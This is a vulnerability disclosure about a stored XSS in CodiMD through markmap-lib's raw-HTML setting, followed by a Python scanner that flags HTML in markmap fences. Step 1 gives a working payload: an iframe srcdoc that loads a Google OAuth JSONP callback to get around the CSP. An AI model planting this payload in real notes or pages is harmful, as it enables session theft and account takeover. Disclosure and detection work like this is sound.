I have raised an issue to markmap about this vulnerability
Root cause
Codimd uses markmap-lib, as documented here. However, markmap-lib allows arbitrary HTML to be specified, thanks to the following markdown-it configuration:
https://github.com/markmap/markmap/blob/205367a24603dc187f67da1658940c6cade20dce/packages/markmap-lib/src/markdown-it.ts#L7-L11
Proof-of-Concept
The proof of concept for this vulnerability can be found here
Steps to Reproduce
Step 1: Create a note with the following content. The iframe has a srcdoc that bypasses the HackMD CSP
```markmap
- xss: <iframe srcdoc="<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(window.origin)'></script>"></iframe>
```
Step 2: View it and trigger the XSS
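As an added example (not part of the original report or of markmap's code), a small check an operator could run over stored notes to flag raw HTML inside ```markmap fences, which is the condition this report relies on; the tag and attribute lists are assumptions, and the sample note is constructed with a placeholder URL:

```python
import re
from html.parser import HTMLParser

# Assumed policy: these raw HTML tags/attributes have no place in user-supplied
# markmap content rendered with markdown-it's html option enabled.
DANGEROUS_TAGS = {"iframe", "script", "object", "embed", "svg", "math",
                  "style", "link", "meta", "base", "form"}
DANGEROUS_ATTRS = {"srcdoc", "src", "href", "formaction", "style"}

# Matches a fenced block whose info string is exactly "markmap".
FENCE_RE = re.compile(r"^```markmap[ \t]*\n(.*?)^```[ \t]*$", re.S | re.M)


class RawHtmlFinder(HTMLParser):
    """Collects every raw HTML start tag together with its risky attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        risky = [name for name, _ in attrs
                 if name in DANGEROUS_ATTRS or name.startswith("on")]
        if tag in DANGEROUS_TAGS or risky:
            self.findings.append((tag, sorted(risky)))

    handle_startendtag = handle_starttag  # also catch <img ... /> style tags


def markmap_blocks(note):
    """Return the bodies of all ```markmap fences in a note."""
    return FENCE_RE.findall(note)


def scan_note(note):
    """Return (tag, [risky attrs]) for each raw HTML element in markmap fences."""
    findings = []
    for block in markmap_blocks(note):
        finder = RawHtmlFinder()
        finder.feed(block)
        finder.close()
        findings.extend(finder.findings)
    return findings


# Constructed sample note in the shape of the report's PoC (placeholder URL).
SAMPLE_NOTE = ("```markmap\n"
               "- xss: <iframe srcdoc=\"<script src='https://example.invalid/x.js'>"
               "</script>\"></iframe>\n```\n")

if __name__ == "__main__":
    print(scan_note(SAMPLE_NOTE))  # [('iframe', ['srcdoc'])]
```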
Impact
This stored XSS can lead to account compromise through cookie exfiltration; attackers can also perform any action on behalf of the user.